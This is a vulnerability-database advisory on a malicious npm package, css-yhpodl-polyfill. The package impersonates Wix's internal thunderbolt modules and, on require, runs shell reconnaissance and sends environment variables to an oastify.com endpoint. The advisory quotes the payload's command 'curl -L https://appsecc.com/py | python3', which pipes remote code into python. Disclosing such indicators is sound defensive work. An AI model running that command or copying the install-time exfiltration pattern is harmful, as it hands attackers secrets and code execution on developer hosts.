VDB
GCVE-110-OSM-2026-13287
GCVE-110-OSM-2026-13287
Advisory PublishedCVSS 5.4/10
css-yhpodl-polyfill ships thunderboltRegistry.js which, as an IIFE executed on require, runs shell reconnaissance (`id`, `whoami`, `env`, `ifconfig`/`ip addr`, hostname) via child_process.execSync and sends the collected host identity and full environment variables via GET to the hardcoded Burp Collaborator OAST endpoint https://unl9pgk6ei4uf80n5tf4iktspjvbuzkn9.oastify.com/. The same file executes `curl -L https://appsecc.com/py | python3`, piping an attacker-controlled remote Python payload into python3 for arbitrary code execution on the installer host. The package name and exported identifiers (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry) impersonate Wix's internal thunderbolt namespace, and registry-manifest.min.json references parastorage.com (Wix CDN) — the shape of a targeted dependency-confusion attack against the Wix engineering build pipeline. Installing or requiring this package exfiltrates environment secrets and grants remote code execution to the attacker.
ENTRY
index.js (main: index.js)
DESTINATION
- 4 exfil (oast, custom-c2)
(values recorded in verified_iocs)
EXFIL
- OAST/Interactsh Exfiltration in thunderboltRegistry.js: "oastify.com"
- Data Encoding for Exfiltration in thunderboltRegistry.js: "encodeURIComponent(site)).catch(function(){}); } catch(e"
- Curl/Wget Pipe to Shell in thunderboltRegistry.js: "curl -L https://appsecc.com/py | python"
- System Information Collection in thunderboltRegistry.js: "process.platform"
- Suspicious Domain in thunderboltRegistry.js: "oastify.com"
ADDITIONAL FINDINGS
- Shell Command Execution in thunderboltRegistry.js: "require("child_process")"
PAYLOAD FILES
thunderboltRegistry.js
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
5.4/10
Medium · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | css-yhpodl-polyfill | all (affected) | — |
Aliases
Browse GCVE Records
3,130 records in the GCVE database · Updated October 6, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.